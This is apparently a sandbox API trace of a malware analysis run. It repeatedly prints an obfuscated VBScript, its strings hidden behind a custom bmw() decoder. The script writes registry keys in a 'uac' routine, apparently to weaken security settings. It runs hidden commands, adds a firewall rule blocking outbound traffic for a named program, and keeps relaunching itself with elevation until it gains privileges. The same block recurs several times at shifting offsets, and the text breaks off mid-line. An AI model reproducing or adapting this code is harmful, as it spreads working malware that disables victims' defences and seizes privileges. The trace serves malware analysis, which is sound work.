bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.019] wcsncmp (_String1="e.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.019] wcsncmp (_String1=".Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.019] wcsncmp (_String1="Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0223.019] wcsncmp (_String1="ame = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.019] wcsncmp (_String1="me = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 